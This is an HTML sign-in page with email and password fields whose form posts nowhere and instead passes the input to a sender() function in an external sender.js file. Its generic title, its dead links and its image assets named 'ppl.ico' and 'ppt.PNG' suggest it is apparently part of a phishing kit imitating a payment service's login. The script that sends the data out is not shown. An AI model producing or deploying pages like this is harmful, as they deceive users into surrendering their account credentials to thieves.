<!DOCTYPE html>
<html dir="ltr">
    <head>
        <title>Sign into your account</title>
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta http-equiv="X-UA-COMPATIBLE" content="IE-edge" />
        <meta charset="utf8">
        <link rel="stylesheet" href="css/normalize.css" />
  
        <link rel="stylesheet" href="css/font-awesome.min.css" />
        <link rel="stylesheet" href="css/login.css" />
        <link rel="shortcut icon" type="image/x-icon" href="img/ppl.ico">
    </head>
    <body>
        <div class="lod-full" style="display: none;">
            <div class="lod-c"></div>
        </div>
        <style>

            @media (max-width: 430px){
                .log-f{
                    padding: 0 8% 30px;
                }
            }
                .error {
                    border: 1px solid #c72e2e;
                }
            </style>
        <div class="contain">
            <form   action="" onsubmit=" return sender()">
			<div class="log-f">
			
                <center>
                    <img src="img/ppt.PNG">
                </center>
                <input id="email" type="email" name="mail" class="in-form" placeholder="Email" required="required" autocomplete="off" autocorrect="off" autocapitalize="on" aria-required="true">
                <input id="pass" type="password" name="pass" class="in-form" placeholder="Password" required="required" autocomplete="off" autocorrect="off" autocapitalize="on" aria-required="true">
                <br>
				
                <button  class="login-btn"type="submit" >Next</button>
                <a href="#" class="problem">Having trouble logging in ?</a>
                <hr class="hr ou">
                <a href="#" class="login-btn sin-up" >Sign Up</a>
				</div>
            </form>
        </div>
			  <script src="sender.js"></script>
		   </body>
</html>